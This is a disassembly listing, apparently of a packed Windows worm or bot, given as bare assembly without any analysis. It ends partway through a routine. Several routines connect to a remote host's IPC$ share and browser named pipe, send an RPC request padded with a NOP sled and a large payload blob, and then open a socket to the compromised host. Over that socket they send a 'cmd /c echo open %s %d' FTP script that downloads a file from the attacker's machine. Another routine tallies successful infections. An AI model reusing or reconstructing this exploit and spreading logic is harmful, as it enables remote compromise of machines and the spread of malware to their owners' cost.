loc_40D58B: ; CODE XREF: sub_40D561+25j cmp edi, ebx jnz short loc_40D5AD push dword_427690 add esi, ecx mov ecx, edi push esi call sub_40D725 push [ebp+arg_4] mov ecx, edi push 0 call sub_40D725 jmp short loc_40D626 ; --------------------------------------------------------------------------- loc_40D5AD: ; CODE XREF: sub_40D561+2Cj test esi, esi jbe short loc_40D5F0 cmp esi, eax jnz short loc_40D5F0 mov eax, [ebx+4] test eax, eax jnz short loc_40D5C1 mov eax, offset dword_4276A0 loc_40D5C1: ; CODE XREF: sub_40D561+59j cmp byte ptr [eax-1], 0FEh jnb short loc_40D5F0 push 1 mov ecx, edi call sub_40D6B4 mov eax, [ebx+4] test eax, eax jnz short loc_40D5DC mov eax, offset dword_4276A0 loc_40D5DC: ; CODE XREF: sub_40D561+74j mov [edi+4], eax mov ecx, [ebx+8] mov [edi+8], ecx mov ecx, [ebx+0Ch] mov [edi+0Ch], ecx inc byte ptr [eax-1] jmp short loc_40D626 ; --------------------------------------------------------------------------- loc_40D5F0: ; CODE XREF: sub_40D561+4Ej ; sub_40D561+52j ... push 1 push esi mov ecx, edi call sub_40D62F test al, al jz short loc_40D626 mov eax, [ebx+4] test eax, eax jnz short loc_40D60A mov eax, offset dword_4276A0 loc_40D60A: ; CODE XREF: sub_40D561+A2j mov ecx, [ebp+arg_4] push esi add eax, ecx push eax push dword ptr [edi+4] call sub_41C310 mov eax, [edi+4] add esp, 0Ch mov [edi+8], esi and byte ptr [eax+esi], 0 loc_40D626: ; CODE XREF: sub_40D561+4Aj ; sub_40D561+8Dj ... mov eax, edi pop edi pop esi pop ebx pop ebp retn 0Ch sub_40D561 endp ; =============== S U B R O U T I N E ======================================= sub_40D62F proc near ; CODE XREF: sub_40D07D+3Dp ; sub_40D4B1+28p ... arg_0 = dword ptr 4 arg_4 = byte ptr 8 push esi push edi mov edi, [esp+8+arg_0] mov esi, ecx cmp edi, 0FFFFFFFDh jbe short loc_40D641 call sub_42669A loc_40D641: ; CODE XREF: sub_40D62F+Bj mov ecx, [esi+4] xor edx, edx cmp ecx, edx jz short loc_40D66A mov al, [ecx-1] cmp al, dl jz short loc_40D66A cmp al, 0FFh jz short loc_40D66A cmp edi, edx jnz short loc_40D6A5 dec al push edx mov [ecx-1], al loc_40D65F: ; CODE XREF: sub_40D62F+47j mov ecx, esi call sub_40D6B4 loc_40D666: ; CODE XREF: sub_40D62F+4Bj ; sub_40D62F+52j xor al, al jmp short loc_40D6AF ; --------------------------------------------------------------------------- loc_40D66A: ; CODE XREF: sub_40D62F+19j ; sub_40D62F+20j ... cmp edi, edx jnz short loc_40D683 cmp [esp+8+arg_4], dl jz short loc_40D678 push 1 jmp short loc_40D65F ; --------------------------------------------------------------------------- loc_40D678: ; CODE XREF: sub_40D62F+43j cmp ecx, edx jz short loc_40D666 mov [esi+8], edx mov [ecx], dl jmp short loc_40D666 ; --------------------------------------------------------------------------- loc_40D683: ; CODE XREF: sub_40D62F+3Dj cmp [esp+8+arg_4], dl jz short loc_40D6A0 mov eax, [esi+0Ch] cmp eax, 1Fh ja short loc_40D695 cmp eax, edi jnb short loc_40D6AD loc_40D695: ; CODE XREF: sub_40D62F+60j push 1 mov ecx, esi call sub_40D6B4 jmp short loc_40D6A5 ; --------------------------------------------------------------------------- loc_40D6A0: ; CODE XREF: sub_40D62F+58j cmp [esi+0Ch], edi jnb short loc_40D6AD loc_40D6A5: ; CODE XREF: sub_40D62F+28j ; sub_40D62F+6Fj push edi mov ecx, esi call sub_40D78C loc_40D6AD: ; CODE XREF: sub_40D62F+64j ; sub_40D62F+74j mov al, 1 loc_40D6AF: ; CODE XREF: sub_40D62F+39j pop edi pop esi retn 8 sub_40D62F endp ; =============== S U B R O U T I N E ======================================= sub_40D6B4 proc near ; CODE XREF: sub_40D07D+1Fp ; sub_40D07D+16Ap ... arg_0 = byte ptr 4 cmp [esp+arg_0], 0 push esi mov esi, ecx jz short loc_40D6E0 mov eax, [esi+4] test eax, eax jz short loc_40D6E0 lea ecx, [eax-1] mov al, [eax-1] test al, al jz short loc_40D6D9 cmp al, 0FFh jz short loc_40D6D9 dec al mov [ecx], al jmp short loc_40D6E0 ; --------------------------------------------------------------------------- loc_40D6D9: ; CODE XREF: sub_40D6B4+19j ; sub_40D6B4+1Dj push ecx call sub_41CC83 pop ecx loc_40D6E0: ; CODE XREF: sub_40D6B4+8j ; sub_40D6B4+Fj ... and dword ptr [esi+4], 0 and dword ptr [esi+8], 0 and dword ptr [esi+0Ch], 0 pop esi retn 4 sub_40D6B4 endp ; =============== S U B R O U T I N E ======================================= sub_40D6F0 proc near ; CODE XREF: UPX0:0040D410p ; sub_40D849+28p ... arg_0 = dword ptr 4 arg_4 = dword ptr 8 push esi push edi mov edi, [esp+8+arg_4] push 1 mov esi, ecx push edi call sub_40D62F test al, al jz short loc_40D71E push edi push [esp+0Ch+arg_0] push dword ptr [esi+4] call sub_41C310 mov eax, [esi+4] add esp, 0Ch mov [esi+8], edi and byte ptr [eax+edi], 0 loc_40D71E: ; CODE XREF: sub_40D6F0+12j mov eax, esi pop edi pop esi retn 8 sub_40D6F0 endp ; =============== S U B R O U T I N E ======================================= sub_40D725 proc near ; CODE XREF: sub_40D561+39p ; sub_40D561+45p arg_0 = dword ptr 4 arg_4 = dword ptr 8 push ebx push esi mov esi, [esp+8+arg_0] push edi mov edi, ecx cmp [edi+8], esi jnb short loc_40D738 call sub_426573 loc_40D738: ; CODE XREF: sub_40D725+Cj mov ecx, edi call sub_40D849 mov eax, [edi+8] mov ebx, [esp+0Ch+arg_4] sub eax, esi cmp eax, ebx jnb short loc_40D74E mov ebx, eax loc_40D74E: ; CODE XREF: sub_40D725+25j test ebx, ebx jbe short loc_40D784 mov ecx, [edi+4] sub eax, ebx add ecx, esi push eax lea eax, [ecx+ebx] push eax push ecx call sub_41CC90 mov esi, [edi+8] add esp, 0Ch sub esi, ebx mov ecx, edi push 0 push esi call sub_40D62F test al, al jz short loc_40D784 mov eax, [edi+4] mov [edi+8], esi and byte ptr [esi+eax], 0 loc_40D784: ; CODE XREF: sub_40D725+2Bj ; sub_40D725+53j mov eax, edi pop edi pop esi pop ebx retn 8 sub_40D725 endp ; =============== S U B R O U T I N E ======================================= sub_40D78C proc near ; CODE XREF: sub_40D62F+79p mov eax, offset loc_426E20 call sub_41CC64 sub esp, 0Ch push ebx push esi push edi mov edi, [ebp+8] or edi, 1Fh mov esi, ecx cmp edi, 0FFFFFFFDh mov [ebp-10h], esp mov [ebp-14h], esi jbe short loc_40D7B2 mov edi, [ebp+8] loc_40D7B2: ; CODE XREF: sub_40D78C+21j and dword ptr [ebp-4], 0 lea eax, [edi+2] test eax, eax jge short loc_40D7BF xor eax, eax loc_40D7BF: ; CODE XREF: sub_40D78C+2Fj push eax call sub_41CFC5 pop ecx mov [ebp+8], eax jmp short loc_40D7F0 ; --------------------------------------------------------------------------- mov eax, [ebp+8] mov [ebp-18h], eax add eax, 2 test eax, eax jge short loc_40D7DA xor eax, eax loc_40D7DA: ; CODE XREF: sub_40D78C+4Aj push eax call sub_41CFC5 mov [ebp+8], eax pop ecx mov eax, offset loc_40D7EA retn ; --------------------------------------------------------------------------- loc_40D7EA: ; DATA XREF: sub_40D78C+58o mov esi, [ebp-14h] mov edi, [ebp-18h] loc_40D7F0: ; CODE XREF: sub_40D78C+3Dj mov eax, [esi+8] test eax, eax jbe short loc_40D80E cmp eax, edi jbe short loc_40D7FD mov eax, edi loc_40D7FD: ; CODE XREF: sub_40D78C+6Dj push eax mov eax, [ebp+8] push dword ptr [esi+4] inc eax push eax call sub_41C310 add esp, 0Ch loc_40D80E: ; CODE XREF: sub_40D78C+69j mov ebx, [esi+8] push 1 mov ecx, esi call sub_40D6B4 mov eax, [ebp+8] inc eax mov [esi+4], eax and byte ptr [eax-1], 0 cmp ebx, edi mov [esi+0Ch], edi ja short loc_40D82E mov edi, ebx loc_40D82E: ; CODE XREF: sub_40D78C+9Ej mov eax, [esi+4] mov ecx, [ebp-0Ch] mov [esi+8], edi and byte ptr [eax+edi], 0 pop edi pop esi mov large fs:0, ecx pop ebx leave retn 4 sub_40D78C endp ; =============== S U B R O U T I N E ======================================= sub_40D849 proc near ; CODE XREF: sub_40D725+15p push esi push edi mov edi, ecx mov esi, [edi+4] test esi, esi jz short loc_40D876 mov al, [esi-1] test al, al jz short loc_40D876 cmp al, 0FFh jz short loc_40D876 push 1 call sub_40D6B4 push esi call sub_41AFE0 pop ecx push eax push esi mov ecx, edi call sub_40D6F0 loc_40D876: ; CODE XREF: sub_40D849+9j ; sub_40D849+10j ... pop edi pop esi retn sub_40D849 endp ; =============== S U B R O U T I N E ======================================= sub_40D879 proc near ; DATA XREF: UPX0:00429008o test ds:byte_4DBC74, 1 jnz short loc_40D889 or ds:byte_4DBC74, 1 loc_40D889: ; CODE XREF: sub_40D879+7j jmp $+5 push offset nullsub_1 call sub_41D040 pop ecx retn sub_40D879 endp ; [00000001 BYTES: COLLAPSED FUNCTION nullsub_1. PRESS KEYPAD "+" TO EXPAND] ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_40D89B proc near ; DATA XREF: UPX0:0042900Co jmp $+5 sub_40D89B endp ; sp-analysis failed ; =============== S U B R O U T I N E ======================================= sub_40D8A0 proc near mov eax, dword_4328C0 add eax, 6 mov ds:dword_4CE374, eax retn sub_40D8A0 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_40D8AE proc near ; CODE XREF: sub_40D8AE+D0p ; sub_40D99C+471p var_8 = dword ptr -8 var_4 = dword ptr -4 arg_0 = dword ptr 8 arg_4 = byte ptr 0Ch arg_7 = byte ptr 0Fh arg_C = word ptr 14h arg_14 = dword ptr 1Ch arg_1C = dword ptr 24h arg_20 = dword ptr 28h arg_24 = dword ptr 2Ch arg_28 = byte ptr 30h arg_2B = byte ptr 33h push ebp mov ebp, esp push ecx push ecx cmp [ebp+arg_28], 0 push ebx push esi push edi jz short loc_40D8C2 or [ebp+arg_7], 1 jmp short loc_40D8C6 ; --------------------------------------------------------------------------- loc_40D8C2: ; CODE XREF: sub_40D8AE+Cj and [ebp+arg_7], 0FEh loc_40D8C6: ; CODE XREF: sub_40D8AE+12j mov ecx, [ebp+arg_24] mov ebx, [ebp+arg_20] movzx eax, cx lea edx, [ebx+18h] cmp edx, eax ja short loc_40D8EA or [ebp+arg_7], 2 and [ebp+arg_2B], 0 lea eax, [ebx+18h] mov [ebp+arg_14], ebx mov [ebp+arg_C], ax jmp short loc_40D8FC ; --------------------------------------------------------------------------- loc_40D8EA: ; CODE XREF: sub_40D8AE+26j add eax, 0FFFFFFE8h and [ebp+arg_7], 0FDh mov [ebp+arg_C], cx mov [ebp+arg_14], eax mov [ebp+arg_2B], 1 loc_40D8FC: ; CODE XREF: sub_40D8AE+3Aj movzx eax, [ebp+arg_C] push eax mov [ebp+var_4], eax call sub_41B4D5 test eax, eax pop ecx mov [ebp+arg_20], eax jz loc_40D995 push 6 lea esi, [ebp+arg_4] pop ecx mov edi, eax rep movsd mov edi, [ebp+arg_14] mov esi, [ebp+arg_1C] push edi add eax, 18h push esi push eax call sub_41C310 add esp, 0Ch lea eax, [ebp+var_8] push 0 push eax push [ebp+var_4] push [ebp+arg_20] push [ebp+arg_0] call dword_4270E0 ; WriteFile test eax, eax jz short loc_40D98C mov eax, [ebp+var_4] cmp [ebp+var_8], eax jnz short loc_40D98C push [ebp+arg_20] call sub_41B0B1 cmp [ebp+arg_2B], 0 pop ecx jz short loc_40D988 push 0 sub ebx, edi push [ebp+arg_24] add edi, esi lea esi, [ebp+arg_4] push ebx push edi sub esp, 18h push 6 pop ecx mov edi, esp push [ebp+arg_0] rep movsd call sub_40D8AE add esp, 2Ch jmp short loc_40D997 ; --------------------------------------------------------------------------- loc_40D988: ; CODE XREF: sub_40D8AE+B3j mov al, 1 jmp short loc_40D997 ; --------------------------------------------------------------------------- loc_40D98C: ; CODE XREF: sub_40D8AE+9Cj ; sub_40D8AE+A4j push [ebp+arg_20] call sub_41B0B1 pop ecx loc_40D995: ; CODE XREF: sub_40D8AE+61j xor al, al loc_40D997: ; CODE XREF: sub_40D8AE+D8j ; sub_40D8AE+DCj pop edi pop esi pop ebx leave retn sub_40D8AE endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_40D99C proc near ; CODE XREF: UPX0:0040DF9Ap var_60DC = byte ptr -60DCh var_40DC = byte ptr -40DCh var_20DC = byte ptr -20DCh var_DC = byte ptr -0DCh var_C8 = dword ptr -0C8h var_BC = byte ptr -0BCh var_B8 = byte ptr -0B8h var_B7 = byte ptr -0B7h var_B6 = byte ptr -0B6h var_B5 = byte ptr -0B5h var_B4 = dword ptr -0B4h var_B0 = word ptr -0B0h var_AE = word ptr -0AEh var_AC = dword ptr -0ACh var_A8 = word ptr -0A8h var_A6 = word ptr -0A6h var_A4 = dword ptr -0A4h var_A0 = dword ptr -0A0h var_9C = word ptr -9Ch var_9A = byte ptr -9Ah var_98 = byte ptr -98h var_88 = dword ptr -88h var_84 = byte ptr -84h var_74 = dword ptr -74h var_70 = dword ptr -70h var_6C = dword ptr -6Ch var_68 = dword ptr -68h var_64 = dword ptr -64h var_60 = word ptr -60h var_5C = byte ptr -5Ch var_4C = dword ptr -4Ch var_48 = byte ptr -48h var_47 = byte ptr -47h var_46 = byte ptr -46h var_45 = byte ptr -45h var_44 = dword ptr -44h var_3E = word ptr -3Eh var_3C = dword ptr -3Ch var_34 = word ptr -34h var_32 = word ptr -32h var_30 = dword ptr -30h var_2C = dword ptr -2Ch var_28 = dword ptr -28h var_24 = dword ptr -24h var_20 = byte ptr -20h var_1C = dword ptr -1Ch var_18 = dword ptr -18h var_14 = byte ptr -14h var_10 = qword ptr -10h var_8 = dword ptr -8 var_4 = dword ptr -4 arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch push ebp mov ebp, esp mov eax, 60DCh call sub_41BB20 push ebx push esi push edi push offset a_ ; "." push [ebp+arg_0] call sub_41D160 pop ecx xor ebx, ebx test eax, eax pop ecx jz short loc_40DA0F push [ebp+arg_0] mov esi, 2000h lea eax, [ebp+var_20DC] push offset aSIpc ; "\\\\%s\\ipc$" push esi push eax call sub_41B980 push 20h lea eax, [ebp+var_DC] push ebx push eax call sub_41B590 lea eax, [ebp+var_20DC] add esp, 1Ch mov [ebp+var_C8], eax mov eax, offset byte_43D808 push ebx push eax push eax lea eax, [ebp+var_DC] push eax call sub_426750 jmp short loc_40DA14 ; --------------------------------------------------------------------------- loc_40DA0F: ; CODE XREF: sub_40D99C+23j mov esi, 2000h loc_40DA14: ; CODE XREF: sub_40D99C+71j push [ebp+arg_0] lea eax, [ebp+var_40DC] push offset aSPipeBrowser ; "\\\\%s\\pipe\\browser" push esi push eax call sub_41B980 add esp, 10h lea eax, [ebp+var_40DC] push ebx push 40000000h push 3 push ebx push 3 push 0C0000000h push eax call dword_4270EC ; CreateFileA cmp eax, 0FFFFFFFFh mov [ebp+var_4], eax jnz short loc_40DA58 loc_40DA51: ; CODE XREF: sub_40D99C+194j ; sub_40D99C+36Aj ... xor al, al jmp loc_40DE9C ; --------------------------------------------------------------------------- loc_40DA58: ; CODE XREF: sub_40D99C+B3j push 48h lea eax, [ebp+var_B8] push ebx push eax call sub_41B590 push 10h mov [ebp+var_B8], 5 pop eax mov [ebp+var_B7], bl push 1 mov [ebp+var_B4], eax pop edi mov [ebp+var_B6], 0Bh push eax lea eax, [ebp+var_98] push offset dword_432914 push eax mov [ebp+var_B5], 3 mov [ebp+var_B0], 48h mov [ebp+var_AE], bx mov [ebp+var_AC], ebx mov [ebp+var_A8], 10B8h mov [ebp+var_A6], 10B8h mov [ebp+var_A4], ebx mov [ebp+var_A0], edi mov [ebp+var_9C], bx mov [ebp+var_9A], 1 call sub_41C310 push 10h lea eax, [ebp+var_84] push offset dword_432900 push eax mov [ebp+var_88], 3 call sub_41C310 add esp, 24h lea eax, [ebp+var_BC] mov [ebp+var_74], 2 push ebx push eax lea eax, [ebp+var_B8] push 48h push eax push [ebp+var_4] call dword_4270E0 ; WriteFile test eax, eax jnz short loc_40DB35 loc_40DB27: ; CODE XREF: sub_40D99C+265j push [ebp+var_4] call dword_427068 ; CloseHandle jmp loc_40DA51 ; --------------------------------------------------------------------------- loc_40DB35: ; CODE XREF: sub_40D99C+189j lea eax, [ebp+var_14] push ebx push eax lea eax, [ebp+var_60DC] push esi push eax push [ebp+var_4] call dword_4270E8 ; ReadFile push ebx call sub_41D081 push eax call sub_41B8D8 push 14h lea eax, [ebp+var_70] push 41h push eax call sub_41B590 push 1Ch lea eax, [ebp+var_30] push 41h push eax call sub_41B590 add esp, 20h call sub_41B8E2 mov esi, [ebp+arg_4] mov [ebp+var_70], eax mov [ebp+var_64], edi mov [ebp+var_68], ebx lea esi, [esi+esi*4] mov [ebp+var_6C], edi shl esi, 2 mov [ebp+var_60], bx cmp byte_4328A8[esi], bl jz short loc_40DBAC push 4 mov [ebp+var_24], edi mov [ebp+var_28], ebx mov [ebp+var_2C], edi push offset dword_4CE37C jmp short loc_40DBBF ; --------------------------------------------------------------------------- loc_40DBAC: ; CODE XREF: sub_40D99C+1FCj push 2 mov [ebp+var_28], ebx pop eax push 4 mov [ebp+var_24], eax mov [ebp+var_2C], eax push (offset loc_4328F7+1) loc_40DBBF: ; CODE XREF: sub_40D99C+20Ej lea eax, [ebp+var_20] push eax call sub_41C310 add esp, 0Ch call sub_41B8E2 mov edi, 0FAh cdq mov ecx, edi idiv ecx inc edx mov [ebp+var_30], edx call sub_41B8E2 cdq idiv edi mov eax, dword_43289C[esi] mov [ebp+var_18], ebx push eax mov [ebp+arg_0], eax inc edx mov [ebp+var_1C], edx call sub_41B4D5 mov edi, eax pop ecx cmp edi, ebx jz loc_40DB27 mov eax, [ebp+arg_0] add eax, 0FFFFFFFEh push eax push 90h push edi call sub_41B590 mov eax, [ebp+arg_0] push 2 push ebx lea eax, [edi+eax-2] push eax call sub_41B590 mov eax, dword_4328A4[esi] push 7 add eax, edi push offset dword_432890 push eax mov [ebp+arg_4], eax call sub_41C310 mov eax, [ebp+arg_4] push 15Ch add eax, 7 push offset dword_432730 push eax call sub_41C310 mov eax, dword_4328A0[esi] add esp, 30h cmp byte_4328A8[esi], bl mov [ebp+arg_4], eax jz short loc_40DCB8 push 4 add eax, edi push offset dword_4CE374 push eax call sub_41C310 add [ebp+arg_4], 0Ch mov esi, offset dword_4328C0 mov eax, [ebp+arg_4] push 4 add eax, edi push esi push eax call sub_41C310 mov eax, [ebp+arg_4] push 4 push esi lea eax, [eax+edi+24h] push eax mov [ebp+arg_4], eax call sub_41C310 mov eax, [ebp+arg_4] push 4 add eax, 0Ch push esi push eax call sub_41C310 add esp, 30h jmp short loc_40DCE0 ; --------------------------------------------------------------------------- loc_40DCB8: ; CODE XREF: sub_40D99C+2CDj add eax, edi mov [ebp+var_8], 10h mov [ebp+arg_4], eax mov esi, offset dword_4328C0 loc_40DCC9: ; CODE XREF: sub_40D99C+342j push 4 push esi push [ebp+arg_4] call sub_41C310 add [ebp+arg_4], 4 add esp, 0Ch dec [ebp+var_8] jnz short loc_40DCC9 loc_40DCE0: ; CODE XREF: sub_40D99C+31Aj mov eax, [ebp+arg_0] add eax, 42h push eax call sub_41B4D5 mov esi, eax pop ecx cmp esi, ebx mov [ebp+var_8], esi jnz short loc_40DD0B push [ebp+var_4] call dword_427068 ; CloseHandle push edi call sub_41B0B1 pop ecx jmp loc_40DA51 ; --------------------------------------------------------------------------- loc_40DD0B: ; CODE XREF: sub_40D99C+358j mov eax, [ebp+arg_0] add eax, 42h push eax push ebx ; double push esi call sub_41B590 lea eax, [ebp+var_70] push 14h push eax push esi call sub_41C310 mov eax, [ebp+arg_0] mov dword ptr [ebp+var_10+4], ebx mov dword ptr [ebp+var_10], eax add esp, 10h fild [ebp+var_10] fmul flt_4276A4 fstp [esp+0Ch+var_10+4] call sub_41C7BF call sub_41C798 push [ebp+arg_0] mov [esi+1Ch], eax mov [esi+18h], ebx mov eax, [esi+1Ch] mov [esi+14h], eax lea eax, [esi+20h] push edi push eax call sub_41C310 mov eax, [ebp+arg_0] add esp, 14h add eax, 20h test al, 3 mov [ebp+arg_4], eax jz short loc_40DD78 loc_40DD70: ; CODE XREF: sub_40D99C+3D7j inc eax test al, 3 jnz short loc_40DD70 mov [ebp+arg_4], eax loc_40DD78: ; CODE XREF: sub_40D99C+3D2j lea ecx, [ebp+var_30] push 1Ch add eax, esi push ecx push eax call sub_41C310 add [ebp+arg_4], 1Ch push edi call sub_41B0B1 push 18h lea eax, [ebp+var_48] push ebx push eax call sub_41B590 push 14h lea eax, [ebp+var_5C] push ebx push eax mov [ebp+var_48], 5 mov [ebp+var_47], bl mov [ebp+var_46], bl mov [ebp+var_45], 3 mov [ebp+var_44], 10h mov [ebp+var_3E], bx mov [ebp+var_3C], ebx mov [ebp+var_34], bx mov [ebp+var_32], 1Fh call sub_41B590 add esp, 28h push ebx push ebx push 1 push ebx call dword_4270E4 ; CreateEventA mov [ebp+var_4C], eax mov byte ptr [ebp+arg_0+3], bl mov dword ptr [ebp+var_10+4], ebx loc_40DDE5: ; CODE XREF: sub_40D99C+4D3j cmp dword ptr [ebp+var_10+4], 2 jge loc_40DE7A push 1 push 10B8h push [ebp+arg_4] inc dword ptr [ebp+var_10+4] push esi lea esi, [ebp+var_48] sub esp, 18h push 6 pop ecx mov edi, esp push [ebp+var_4] rep movsd call sub_40D8AE add esp, 2Ch test al, al jz short loc_40DE77 cmp [ebp+var_4C], ebx jz short loc_40DE69 lea eax, [ebp+var_5C] push eax lea eax, [ebp+var_14] push eax lea eax, [ebp+var_60DC] push 2000h push eax push [ebp+var_4] call dword_4270E8 ; ReadFile test eax, eax jnz short loc_40DE50 call dword_42708C ; RtlGetLastWin32Error cmp eax, 3E5h jnz loc_40DA51 loc_40DE50: ; CODE XREF: sub_40D99C+4A1j push 3E8h push [ebp+var_4C] call dword_4270A0 ; WaitForSingleObject cmp eax, 102h jnz short loc_40DE69 mov byte ptr [ebp+arg_0+3], 1 loc_40DE69: ; CODE XREF: sub_40D99C+480j ; sub_40D99C+4C7j cmp byte ptr [ebp+arg_0+3], bl mov esi, [ebp+var_8] jz loc_40DDE5 jmp short loc_40DE7A ; --------------------------------------------------------------------------- loc_40DE77: ; CODE XREF: sub_40D99C+47Bj mov esi, [ebp+var_8] loc_40DE7A: ; CODE XREF: sub_40D99C+44Dj ; sub_40D99C+4D9j push [ebp+var_4] mov edi, dword_427068 call edi ; CloseHandle push esi call sub_41B0B1 cmp [ebp+var_4C], ebx pop ecx jz short loc_40DE96 push [ebp+var_4C] call edi ; CloseHandle loc_40DE96: ; CODE XREF: sub_40D99C+4F3j cmp byte ptr [ebp+arg_0+3], bl setnz al loc_40DE9C: ; CODE XREF: sub_40D99C+B7j pop edi pop esi pop ebx leave retn sub_40D99C endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_40DEA1 proc near ; CODE XREF: UPX0:0040DFB8p var_5A0 = byte ptr -5A0h var_1A0 = byte ptr -1A0h var_10 = word ptr -10h var_E = word ptr -0Eh var_C = dword ptr -0Ch arg_0 = dword ptr 8 arg_4 = byte ptr 0Ch arg_BC = dword ptr 0C4h push ebp mov ebp, esp sub esp, 5A0h push ebx push esi push edi xor esi, esi push 10h lea eax, [ebp+var_10] push esi push eax call sub_41B590 add esp, 0Ch lea eax, [ebp+arg_4] mov [ebp+var_10], 2 push eax call dword_42720C ; inet_addr push [ebp+arg_BC] mov [ebp+var_C], eax call dword_427210 ; htons push esi push 1 push 2 mov [ebp+var_E], ax call dword_427220 ; socket mov ebx, eax cmp ebx, 0FFFFFFFFh jz short loc_40DF6F lea eax, [ebp+var_10] push 10h push eax push ebx call dword_427214 ; connect cmp eax, 0FFFFFFFFh jz short loc_40DF6F mov edi, 400h push esi mov esi, dword_427218 lea eax, [ebp+var_5A0] push edi push eax push ebx call esi ; recv mov eax, offset byte_429110 push eax push eax push ds:dword_4CB390 push [ebp+arg_0] call sub_40AC10 pop ecx push eax push offset aCmdCEchoOpen_0 ; "cmd /c echo open %s %d >> ii &echo user"... lea eax, [ebp+var_1A0] push 190h push eax call sub_41B980 add esp, 1Ch lea eax, [ebp+var_1A0] push 0 push eax call sub_41AFE0 pop ecx push eax lea eax, [ebp+var_1A0] push eax push ebx call dword_427224 ; send cmp eax, 0FFFFFFFFh jnz short loc_40DF73 loc_40DF6F: ; CODE XREF: sub_40DEA1+50j ; sub_40DEA1+62j xor eax, eax jmp short loc_40DF8A ; --------------------------------------------------------------------------- loc_40DF73: ; CODE XREF: sub_40DEA1+CCj push 0 lea eax, [ebp+var_5A0] push edi push eax push ebx call esi ; recv push ebx call dword_42721C ; closesocket push 1 pop eax loc_40DF8A: ; CODE XREF: sub_40DEA1+D0j pop edi pop esi pop ebx leave retn sub_40DEA1 endp ; --------------------------------------------------------------------------- push ebx push esi push edi xor ebx, ebx loc_40DF94: ; CODE XREF: UPX0:0040DFDAj lea eax, [esp+14h] push ebx push eax call sub_40D99C pop ecx test al, al pop ecx jz short loc_40DFC7 push 65h lea esi, [esp+14h] sub esp, 0BCh push 2Fh pop ecx mov edi, esp rep movsd call sub_40DEA1 add esp, 0C0h test eax, eax jnz short loc_40DFDC loc_40DFC7: ; CODE XREF: UPX0:0040DFA3j test ebx, ebx jnz short loc_40DFD6 push 7D0h call dword_427078 ; Sleep loc_40DFD6: ; CODE XREF: UPX0:0040DFC9j inc ebx cmp ebx, 2 jb short loc_40DF94 loc_40DFDC: ; CODE XREF: UPX0:0040DFC5j push 1 pop eax pop edi pop esi pop ebx retn ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_40DFE3 proc near ; CODE XREF: sub_40E0D1+91p var_5A0 = byte ptr -5A0h var_1A0 = byte ptr -1A0h var_10 = word ptr -10h var_E = word ptr -0Eh var_C = dword ptr -0Ch arg_0 = dword ptr 8 arg_4 = byte ptr 0Ch arg_BC = dword ptr 0C4h push ebp mov ebp, esp sub esp, 5A0h push ebx push esi push edi xor esi, esi push 10h lea eax, [ebp+var_10] push esi push eax call sub_41B590 add esp, 0Ch lea eax, [ebp+arg_4] mov [ebp+var_10], 2 push eax call dword_42720C ; inet_addr push [ebp+arg_BC] mov [ebp+var_C], eax call dword_427210 ; htons push esi push 1 push 2 mov [ebp+var_E], ax call dword_427220 ; socket mov ebx, eax cmp ebx, 0FFFFFFFFh jz short loc_40E0B1 lea eax, [ebp+var_10] push 10h push eax push ebx call dword_427214 ; connect cmp eax, 0FFFFFFFFh jz short loc_40E0B1 mov edi, 400h push esi mov esi, dword_427218 lea eax, [ebp+var_5A0] push edi push eax push ebx call esi ; recv mov eax, offset byte_429110 push eax push eax push ds:dword_4CB390 push [ebp+arg_0] call sub_40AC10 pop ecx push eax push offset aCmdCEchoOpen_0 ; "cmd /c echo open %s %d >> ii &echo user"... lea eax, [ebp+var_1A0] push 190h push eax call sub_41B980 add esp, 1Ch lea eax, [ebp+var_1A0] push 0 push eax call sub_41AFE0 pop ecx push eax lea eax, [ebp+var_1A0] push eax push ebx call dword_427224 ; send cmp eax, 0FFFFFFFFh jnz short loc_40E0B5 loc_40E0B1: ; CODE XREF: sub_40DFE3+50j ; sub_40DFE3+62j xor eax, eax jmp short loc_40E0CC ; --------------------------------------------------------------------------- loc_40E0B5: ; CODE XREF: sub_40DFE3+CCj push 0 lea eax, [ebp+var_5A0] push edi push eax push ebx call esi ; recv push ebx call dword_42721C ; closesocket push 1 pop eax loc_40E0CC: ; CODE XREF: sub_40DFE3+D0j pop edi pop esi pop ebx leave retn sub_40DFE3 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_40E0D1 proc near ; CODE XREF: sub_40C125+1EAp ; DATA XREF: UPX0:off_431B04o var_10 = word ptr -10h var_E = word ptr -0Eh var_C = dword ptr -0Ch arg_0 = byte ptr 8 arg_4 = byte ptr 0Ch arg_A0 = dword ptr 0A8h arg_A8 = dword ptr 0B0h push ebp mov ebp, esp sub esp, 10h push esi lea eax, [ebp+arg_4] push edi push eax mov [ebp+var_10], 2 call ds:dword_4CB694 ; inet_addr push [ebp+arg_A0] mov [ebp+var_C], eax call ds:dword_4CB654 ; htons push 6 push 1 push 2 mov [ebp+var_E], ax call dword_427220 ; socket mov esi, eax cmp esi, 0FFFFFFFFh jz short loc_40E143 lea eax, [ebp+var_10] push 10h push eax push esi call dword_427214 ; connect cmp eax, 0FFFFFFFFh jnz short loc_40E124 push esi jmp short loc_40E13D ; --------------------------------------------------------------------------- loc_40E124: ; CODE XREF: sub_40E0D1+4Ej push 0 push 1213h push offset dword_4329BC push esi call dword_427224 ; send cmp eax, 0FFFFFFFFh push esi jnz short loc_40E147 loc_40E13D: ; CODE XREF: sub_40E0D1+51j call dword_42721C ; closesocket loc_40E143: ; CODE XREF: sub_40E0D1+3Cj xor eax, eax jmp short loc_40E189 ; --------------------------------------------------------------------------- loc_40E147: ; CODE XREF: sub_40E0D1+6Aj call dword_42721C ; closesocket push 216Bh lea esi, [ebp+arg_0] sub esp, 0BCh push 2Fh pop ecx mov edi, esp rep movsd call sub_40DFE3 add esp, 0C0h test eax, eax jz short loc_40E186 mov eax, [ebp+arg_A8] shl eax, 6 inc dword_431B08[eax] lea eax, dword_431B08[eax] loc_40E186: ; CODE XREF: sub_40E0D1+9Ej push 1 pop eax loc_40E189: ; CODE XREF: sub_40E0D1+74j pop edi pop esi leave retn sub_40E0D1 endp ; =============== S U B R O U T I N E ======================================= sub_40E18D proc near ; CODE XREF: UPX0:0040E27Bp ; UPX0:0040E2DDp ... arg_0 = dword ptr 4 arg_4 = dword ptr 8 arg_8 = 